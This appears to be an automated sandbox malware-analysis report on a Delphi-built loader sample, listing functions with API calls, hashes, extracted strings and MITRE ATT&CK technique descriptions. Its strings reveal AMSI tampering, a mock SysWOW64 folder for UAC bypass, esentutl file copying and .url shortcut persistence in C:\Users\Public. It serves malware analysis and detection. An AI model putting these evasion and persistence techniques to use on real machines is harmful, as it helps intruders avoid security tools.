Instruction ID: df926f98ff82f14b9f920bdf403e8297e6b093458490a99048dce426044efc0d
Opcode Fuzzy Hash: a09d55ebb0311cb1f7889d089a1ffbf87f17272eafd831353dfd538b9d9e4b5a
Instruction Fuzzy Hash: D643D575A801189FDF21EB65DE909CE73FAFF88304F5044E6A509AB614DE30AE92CF51

Function 02AB3E11 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2805
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA

Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02AADCCB
Part of subcall function 02AADC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02AADD32
Part of subcall function 02AADC8C: NtClose.NTDLL(?), ref: 02AADD3B

Sleep.KERNEL32(000003E8,ScanBuffer,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,ScanString,02B12F60,02ABB7B8,02ABBB30,00000000,00000000,02ABBB24,00000000,00000000), ref: 02AB40CB

Part of subcall function 02AA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
Part of subcall function 02AA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920

Sleep.KERNEL32(000003E8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,000003E8,ScanBuffer,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB4277

Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
Part of subcall function 02AA894C: GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
Part of subcall function 02AA894C: FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6

Sleep.KERNEL32(00004E20,UacScan,02B12F60,02ABB7B8,ScanString,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacInitialize,02B12F60,02ABB7B8), ref: 02AB50EE

Part of subcall function 02AADC04: RtlInitUnicodeString.NTDLL ref: 02AADC2C
Part of subcall function 02AADC04: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02AADC42
Part of subcall function 02AADC04: NtDeleteFile.NTDLL(?), ref: 02AADC61

Strings

UacUninitialize, xrefs: 02AB3E1E, 02AB463E, 02AB4C94, 02AB5377
IconIndex=, xrefs: 02AB6DAD
Initialize, xrefs: 02AB5876, 02AB5C0B, 02AB6007, 02AB61CC, 02AB6438, 02AB656E, 02AB6773
URL=file:", xrefs: 02AB6D57
.url, xrefs: 02AB5D93
[InternetShortcut], xrefs: 02AB6D48
/o, xrefs: 02AB64C0
C:\\Users\\Public\\Libraries\\, xrefs: 02AB616F
ScanBuffer, xrefs: 02AB3FFB, 02AB4202, 02AB4380, 02AB4503, 02AB457F, 02AB4736, 02AB4947, 02AB4B3C, 02AB4D8C, 02AB4F7C, 02AB51F7, 02AB546F, 02AB56B0, 02AB59EA, 02AB5D03, 02AB6083, 02AB63BC, 02AB6666, 02AB686B, 02AB69D1, 02AB6B45, 02AB6BC1
/d , xrefs: 02AB64B5
C:\\Windows \\SysWOW64\\, xrefs: 02AB4822
HotKey=, xrefs: 02AB6EE1
UacScan, xrefs: 02AB3F7F, 02AB40DC, 02AB4288, 02AB440B, 02AB45DC, 02AB46BA, 02AB484F, 02AB4D10, 02AB5079, 02AB53F3, 02AB5B8F, 02AB60FF, 02AB62C4, 02AB65EA, 02AB66F7, 02AB6955, 02AB6A4D
C:\Users\Public\, xrefs: 02AB5D88, 02AB6FF3
UacInitialize, xrefs: 02AB4A44, 02AB4E84, 02AB50FF, 02AB553C, 02AB58F2, 02AB5DDF
C:\\Windows \\SysWOW64\\per.exe, xrefs: 02AB43F5
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02AB64AA
ScanString, xrefs: 02AB3F03, 02AB49C8, 02AB4E08, 02AB4FFD, 02AB55B8, 02AB5752, 02AB5A97, 02AB5E5B, 02AB64F2, 02AB6CD8, 02AB6E4F, 02AB6F07
C:\Users\Public\alpha.exe, xrefs: 02AB54E5
OpenSession, xrefs: 02AB4158, 02AB4304, 02AB4487, 02AB48CB, 02AB4AC0, 02AB4C18, 02AB4F00, 02AB517B, 02AB52FB, 02AB5634, 02AB57CE, 02AB596E, 02AB5B13, 02AB5C87, 02AB5ED7, 02AB5F8B, 02AB6248, 02AB6340, 02AB67EF, 02AB6AC9, 02AB6C3D, 02AB6DD3, 02AB6F83
C:\Users\Public\pha.exe, xrefs: 02AB551B
lld.SLITUTEN, xrefs: 02AB480C
C:\Users\Public\CApha.exe, xrefs: 02AB5500

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Library$Path$FreeSleep$FileLoadNameName_$AddressCloseDeleteInitProcStringUnicodeWrite
String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
API String ID: 3582580975-3926298568
Opcode ID: 58481d66af84689258a663762aa2aa405e12c90e60a33bf732f5a8c689ce4e29
Instruction ID: 81f57be009065d2b1fca8e5473a6cc384e79923456f2e0b985c48318bb128283
Opcode Fuzzy Hash: 58481d66af84689258a663762aa2aa405e12c90e60a33bf732f5a8c689ce4e29
Instruction Fuzzy Hash: 5343E535A8015DDFDF21EB65DE90ACE73FABF89304F5044A69409AB614DE30AE82CF51

Function 02AA894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6

Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC

Strings

bcrypt, xrefs: 02AA895F
BCryptVerifySignature, xrefs: 02AA8973

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: 0362f85ab789c2f5edfcba4d5110e71d71059863e727948752fa007bc2b5932d
Instruction ID: 375e7038693f1e923f6d8c271ee5894ad44351785043d66ffcc0e945e811e2fe
Opcode Fuzzy Hash: 0362f85ab789c2f5edfcba4d5110e71d71059863e727948752fa007bc2b5932d
Instruction Fuzzy Hash: CBF0C271EC03049EE710A769BD89F57F7DCEB80B94F408D69BD0887148CF741852AB50

Function 02AA88B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920

Strings

amsi, xrefs: 02AA88BC
DllGetClassObject, xrefs: 02AA88E6
W, xrefs: 02AA88CD

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 2980007069-2671292670
Opcode ID: 075d5dd7b05f51d0e8294f2b3137b00c88b52a3bfd69647e9f8f5cabb2026365
Instruction ID: 8e76865082aa0fd2dacfc53d0faea36b8198ebc9a2b23e9927dd0c5cc6580cce
Opcode Fuzzy Hash: 075d5dd7b05f51d0e8294f2b3137b00c88b52a3bfd69647e9f8f5cabb2026365
Instruction Fuzzy Hash: 84F0816158C381B9D300E3748C55F4FBACD5F62664F008A18B1A89B2D2DA79D1048B67

Function 02A91A8F Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 02A91B17
Sleep.KERNEL32(0000000A,00000000), ref: 02A91B31

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7676accbb778b673b8ab1eb25dcc8b1f4126c94894dbc1774aaa4f0346fbf9c7
Instruction ID: 779bebe5e396d866b3a44a182ad791cfb2fb473485dcbb8198eb6df3c9004dd6
Opcode Fuzzy Hash: 7676accbb778b673b8ab1eb25dcc8b1f4126c94894dbc1774aaa4f0346fbf9c7
Instruction Fuzzy Hash: 6551F2716412428FDF16CF6AC9C4756BBE1EF46314F5885AED54CCB282EB70C845CB91

Function 02AA8788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02AA8814

Strings

Kernel32, xrefs: 02AA87D3
CreateProcessAsUserW, xrefs: 02AA87A1

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$CreateHandleModuleProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 952078031-2353454454
Opcode ID: 3bfc1be02475786f4bba5be488f18f98917cb64a7dc9bd303df488f17de3aefc
Instruction ID: b06e0337e7c4413bafb6542a76db6309d39b334ed31101fc8ac1ad83c13801da
Opcode Fuzzy Hash: 3bfc1be02475786f4bba5be488f18f98917cb64a7dc9bd303df488f17de3aefc
Instruction Fuzzy Hash: AF11E5B2680248BFEB40EFA9DD51F9A77EDEB4C740F514460BA08D3200CB34ED119B24

Function 02A94198 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd80c6151b330753b683fa1ef41da6c0a4f346333c08b743a574d238b43176b
Instruction ID: c55af05366f60620b1b7157ac67e4ce5bec837caeda7dd8ed6fbec59e3f3fc37
Opcode Fuzzy Hash: 6dd80c6151b330753b683fa1ef41da6c0a4f346333c08b743a574d238b43176b
Instruction Fuzzy Hash: 7D41AB75C80204DFCF25DF2AE18839A7BE5FB4E364FA54969E8088B251CF309896CF51

Function 02AA89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC

Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4

FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$CacheFlushFreeHandleInstructionLibraryMemoryModuleVirtualWrite
String ID:
API String ID: 1648090374-0
Opcode ID: 883a47233347ea55d3c87f10b75d3f290ede24607aee8649aa635c384f857e9a
Instruction ID: 961f368736cfa9c8404a6591687bd2df35321a95c6ac17bbad1b5c1da1effc13
Opcode Fuzzy Hash: 883a47233347ea55d3c87f10b75d3f290ede24607aee8649aa635c384f857e9a
Instruction Fuzzy Hash: 502115706C0300BFEB40FBA5EE11B5EB7E9EF04B00F504590B505E7190DF7499419A19

Function 02A95868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(208A1B20,?,00000105), ref: 02A95886

Part of subcall function 02A95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02A95AE8
Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B06
Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B24
Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001), ref: 02A95BA9
Part of subcall function 02A95ACC: RegCloseKey.ADVAPI32(?,02A95BD8,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
Instruction ID: 8c04e23ef294845c9156600aec11a0d97864036628410415691c5bd2eee7d936
Opcode Fuzzy Hash: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
Instruction Fuzzy Hash: 44E065B1E003149FCF10DFA8C9C1B8633D8AB08750F4449A1EC68CF24ADBB0DA248BE0

Function 02A97E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,Initialize), ref: 02A97E8B

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction ID: 073201c03d8841efc3d9f29d8ba6fa61a67030536a69f6d5a498b966b6fbd832
Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
Instruction Fuzzy Hash: B4C08CF26212000E1E60A7BE1DC421942CD19881387601E21E438CA3C1EF1698232C30

Function 02ABC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(?,00000000), ref: 02ABC36C

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
Instruction ID: 024983de248156400142f06181e6d58df7c16f9741264c4129eb9c6e1c16af5b
Opcode Fuzzy Hash: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
Instruction Fuzzy Hash: 65C048F17907002AFA1196AA5CC2F66569EDB09B20F540652B604AA2D2DAA258108E68

Function 02A91682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02A916A4

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
Instruction ID: 3d9f24ee46d72f6e59b50435300233069c9cb45389a5e979da96727eb2fde9f7
Opcode Fuzzy Hash: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
Instruction Fuzzy Hash: 6FF090B2B406956BDB119F5A9C80782BBD8FB00354F450139EA0897340D770A810CB94

Function 02A916E6 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 02A91704

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c12a9271266879ac1d34b22450af2ff47fef9679e7293d44e04336d67062f251
Instruction ID: 9e8c742f05d291db263b11df9fd4163bbac16b8f89f07bd6f0ae29b60dee247e
Opcode Fuzzy Hash: c12a9271266879ac1d34b22450af2ff47fef9679e7293d44e04336d67062f251
Instruction Fuzzy Hash: 02E04F75740302AFEB105A7E4D80712ABD9AB45664F244575F619DB2D1EAA0D8008B64

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

